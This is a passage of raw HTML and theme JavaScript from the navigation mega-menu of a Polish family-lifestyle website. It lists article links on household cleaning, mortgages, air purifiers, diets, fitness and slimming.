                <div class="td-module-thumb"><a href="http://www.erodzina.com/jak-prawidlowo-umyc-toalete/" rel="bookmark" title="Jak prawidłowo umyć toaletę?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/bathroom-1228427_1280-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/bathroom-1228427_1280-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/bathroom-1228427_1280-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/bathroom-1228427_1280-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Jak prawidłowo umyć toaletę?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/kuchnia-i-lazienka/" class="td-post-category">Kuchnia i Łazienka</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/jak-prawidlowo-umyc-toalete/" rel="bookmark" title="Jak prawidłowo umyć toaletę?">Jak prawidłowo umyć toaletę?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-22T14:48:42+00:00">22 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/kredyt-hipoteczny-na-dom-co-warto-wiedziec/" rel="bookmark" title="Kredyt hipoteczny na dom – co warto wiedzieć?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/5020eb291997a0e6e810820b12548830-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/5020eb291997a0e6e810820b12548830-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/5020eb291997a0e6e810820b12548830-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/5020eb291997a0e6e810820b12548830-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Kredyt hipoteczny na dom – co warto wiedzieć?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/budujemy-i-remontujemy/" class="td-post-category">Budujemy i Remontujemy</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/kredyt-hipoteczny-na-dom-co-warto-wiedziec/" rel="bookmark" title="Kredyt hipoteczny na dom – co warto wiedzieć?">Kredyt hipoteczny na dom – co warto wiedzieć?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-15T15:22:31+00:00">15 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/oczyszczacz-powietrza-czy-warto-kupic/" rel="bookmark" title="Oczyszczacz powietrza czy warto kupić?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/12/oczyszczaczpowietrza1-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/12/oczyszczaczpowietrza1-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/12/oczyszczaczpowietrza1-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/12/oczyszczaczpowietrza1-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Oczyszczacz powietrza czy warto kupić?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/salon-i-sypialnia/" class="td-post-category">Salon i Sypialnia</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/oczyszczacz-powietrza-czy-warto-kupic/" rel="bookmark" title="Oczyszczacz powietrza czy warto kupić?">Oczyszczacz powietrza czy warto kupić?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-12-13T20:01:44+00:00">13 grudnia 2018</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_33_5c5e20b793bd7" data-td_block_id="td_uid_33_5c5e20b793bd7"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_33_5c5e20b793bd7" data-td_block_id="td_uid_33_5c5e20b793bd7"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-5101"><a href="http://www.erodzina.com/kategoria/diety-i-fitness/" class="sf-with-ul">Fitness<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_41_5c5e20b79a126 = new tdBlock();
block_td_uid_41_5c5e20b79a126.id = "td_uid_41_5c5e20b79a126";
block_td_uid_41_5c5e20b79a126.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"8","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_41_5c5e20b79a126_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_41_5c5e20b79a126_rand","tdc_css_class_style":"td_uid_41_5c5e20b79a126_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_41_5c5e20b79a126.td_column_number = "3";
block_td_uid_41_5c5e20b79a126.block_type = "td_block_mega_menu";
block_td_uid_41_5c5e20b79a126.post_count = "3";
block_td_uid_41_5c5e20b79a126.found_posts = "208";
block_td_uid_41_5c5e20b79a126.header_color = "";
block_td_uid_41_5c5e20b79a126.ajax_pagination_infinite_stop = "";
block_td_uid_41_5c5e20b79a126.max_num_pages = "70";
tdBlocksArray.push(block_td_uid_41_5c5e20b79a126);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_41_5c5e20b79a126));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-soki-tloczone-smaczna-alternatywa-dla-slodyczy\/\" rel=\"bookmark\" title=\"Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/beverage-882652_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/zdrowe-odzywianie\/\" class=\"td-post-category\">Zdrowe od\u017cywianie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/zdrowe-soki-tloczone-smaczna-alternatywa-dla-slodyczy\/\" rel=\"bookmark\" title=\"Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy\">Zdrowe soki t\u0142oczone \u2013 smaczna alternatywa dla s\u0142odyczy<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-03T11:51:14+00:00\" >3 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bo-sport-to-zdrowie\/\" rel=\"bookmark\" title=\"Bo sport to zdrowie\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Bo sport to zdrowie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/kobieta-i-sport\/\" class=\"td-post-category\">Kobieta i sport<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bo-sport-to-zdrowie\/\" rel=\"bookmark\" title=\"Bo sport to zdrowie\">Bo sport to zdrowie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-11T16:38:53+00:00\" >11 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/prowadzisz-zdrowy-tryb-zycia-znajdz-alternatywe-dla-kranowej-i-sklepowej-wody\/\" rel=\"bookmark\" title=\"Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/b7ced0428e2b6d9adff8cbca53fbb0d8-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/zdrowe-odzywianie\/\" class=\"td-post-category\">Zdrowe od\u017cywianie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/prowadzisz-zdrowy-tryb-zycia-znajdz-alternatywe-dla-kranowej-i-sklepowej-wody\/\" rel=\"bookmark\" title=\"Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody\">Prowadzisz zdrowy tryb \u017cycia? Znajd\u017a alternatyw\u0119 dla kranowej i sklepowej wody<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-09T13:31:31+00:00\" >9 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_41_5c5e20b79a126","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_41_5c5e20b79a126));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 40;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/spirulina-i-chlorella-zielona-zywnosc-i-naturalna-skarbnica-protein\/\" rel=\"bookmark\" title=\"Spirulina i chlorella \u2013 zielona \u017cywno\u015b\u0107 i naturalna skarbnica protein\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/slider-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/slider-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/slider-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/slider-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Spirulina i chlorella \u2013 zielona \u017cywno\u015b\u0107 i naturalna skarbnica protein\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/diety\/\" class=\"td-post-category\">Diety<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/spirulina-i-chlorella-zielona-zywnosc-i-naturalna-skarbnica-protein\/\" rel=\"bookmark\" title=\"Spirulina i chlorella \u2013 zielona \u017cywno\u015b\u0107 i naturalna skarbnica protein\">Spirulina i chlorella \u2013 zielona \u017cywno\u015b\u0107 i naturalna skarbnica protein<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-26T13:47:11+00:00\" >26 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/najgorsze-diety-nie-stosuj-ich-jesli-naprawde-chcesz-zdrowo-schudnac\/\" rel=\"bookmark\" title=\"Najgorsze diety &#8211; nie stosuj ich, je\u015bli naprawd\u0119 chcesz zdrowo schudn\u0105\u0107\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/big_awokado-odchudzanie-2-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/big_awokado-odchudzanie-2-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/big_awokado-odchudzanie-2-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/big_awokado-odchudzanie-2-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Najgorsze diety &#8211; nie stosuj ich, je\u015bli naprawd\u0119 chcesz zdrowo schudn\u0105\u0107\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/diety\/\" class=\"td-post-category\">Diety<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/najgorsze-diety-nie-stosuj-ich-jesli-naprawde-chcesz-zdrowo-schudnac\/\" rel=\"bookmark\" title=\"Najgorsze diety &#8211; nie stosuj ich, je\u015bli naprawd\u0119 chcesz zdrowo schudn\u0105\u0107\">Najgorsze diety &#8211; nie stosuj ich, je\u015bli naprawd\u0119 chcesz zdrowo schudn\u0105\u0107<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-06-20T14:12:07+00:00\" >20 czerwca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/dieta-dr-dabrowskiej-czym-warto-stosowac\/\" rel=\"bookmark\" title=\"Dieta dr D\u0105browskiej \u2013 czym jest i czy warto stosowa\u0107?\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/fitness-3168246_1280.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/fitness-3168246_1280.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/fitness-3168246_1280-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/fitness-3168246_1280-768x511.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/fitness-3168246_1280-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/02\/fitness-3168246_1280-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Dieta dr D\u0105browskiej \u2013 czym jest i czy warto stosowa\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/diety\/\" class=\"td-post-category\">Diety<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/dieta-dr-dabrowskiej-czym-warto-stosowac\/\" rel=\"bookmark\" title=\"Dieta dr D\u0105browskiej \u2013 czym jest i czy warto stosowa\u0107?\">Dieta dr D\u0105browskiej \u2013 czym jest i czy warto stosowa\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-02-28T13:01:42+00:00\" >28 lutego 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_41_5c5e20b79a126","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_41_5c5e20b79a126));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 36;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bo-sport-to-zdrowie\/\" rel=\"bookmark\" title=\"Bo sport to zdrowie\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/36ff890fac12fd0426d2eb1e6e93c98b-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Bo sport to zdrowie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/kobieta-i-sport\/\" class=\"td-post-category\">Kobieta i sport<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bo-sport-to-zdrowie\/\" rel=\"bookmark\" title=\"Bo sport to zdrowie\">Bo sport to zdrowie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-11T16:38:53+00:00\" >11 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/lecznicza-moc-pilatesu\/\" rel=\"bookmark\" title=\"Lecznicza moc pilatesu\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bb-04-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bb-04-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bb-04-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bb-04-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Lecznicza moc pilatesu\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/kobieta-i-sport\/\" class=\"td-post-category\">Kobieta i sport<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/lecznicza-moc-pilatesu\/\" rel=\"bookmark\" title=\"Lecznicza moc pilatesu\">Lecznicza moc pilatesu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-30T16:49:10+00:00\" >30 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-zrobic-forme-do-wakacji-spiesz-sie\/\" rel=\"bookmark\" title=\"Jak zrobi\u0107 form\u0119 do wakacji? \u015apiesz si\u0119\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/miesnie-brzucha-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/miesnie-brzucha-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/miesnie-brzucha-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/04\/miesnie-brzucha-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak zrobi\u0107 form\u0119 do wakacji? \u015apiesz si\u0119\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/kobieta-i-sport\/\" class=\"td-post-category\">Kobieta i sport<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-zrobic-forme-do-wakacji-spiesz-sie\/\" rel=\"bookmark\" title=\"Jak zrobi\u0107 form\u0119 do wakacji? \u015apiesz si\u0119\">Jak zrobi\u0107 form\u0119 do wakacji? \u015apiesz si\u0119<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-04-25T20:56:23+00:00\" >25 kwietnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_41_5c5e20b79a126","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_41_5c5e20b79a126));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 39;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/czy-tabletki-na-odchudzanie-sa-w-stanie-nam-pomoc-w-odchudzaniu\/\" rel=\"bookmark\" title=\"Czy tabletki na odchudzanie s\u0105 w stanie nam pom\u00f3c w odchudzaniu?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/35-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/35-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/35-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/35-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Czy tabletki na odchudzanie s\u0105 w stanie nam pom\u00f3c w odchudzaniu?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/odchudzanie\/\" class=\"td-post-category\">Odchudzanie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/czy-tabletki-na-odchudzanie-sa-w-stanie-nam-pomoc-w-odchudzaniu\/\" rel=\"bookmark\" title=\"Czy tabletki na odchudzanie s\u0105 w stanie nam pom\u00f3c w odchudzaniu?\">Czy tabletki na odchudzanie s\u0105 w stanie nam pom\u00f3c w odchudzaniu?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-01T17:36:50+00:00\" >1 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/uzaleznienie-od-slodyczy-jak-z-nim-wygrac\/\" rel=\"bookmark\" title=\"Uzale\u017cnienie od s\u0142odyczy &#8211; jak z nim wygra\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bakery-1209446_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bakery-1209446_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bakery-1209446_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/bakery-1209446_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Uzale\u017cnienie od s\u0142odyczy &#8211; jak z nim wygra\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/odchudzanie\/\" class=\"td-post-category\">Odchudzanie<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/uzaleznienie-od-slodyczy-jak-z-nim-wygrac\/\" rel=\"bookmark\" title=\"Uzale\u017cnienie od s\u0142odyczy &#8211; jak z nim wygra\u0107?\">Uzale\u017cnienie od s\u0142odyczy &#8211; jak z nim wygra\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-28T08:51:26+00:00\" >28 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/skuteczne-odchudzanie-podstawa-dobry-plan\/\" rel=\"bookmark\" title=\"Skuteczne odchudzanie? Podstawa to dobry plan!\"><img width=\"260\" height=\"162\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/09\/waga.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/09\/waga.jpg 284w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2017\/09\/waga-209x130.jpg 209w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Skuteczne odchudzanie? Podstawa to dobry plan!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/diety-i-fitness\/odchudzanie\/\" 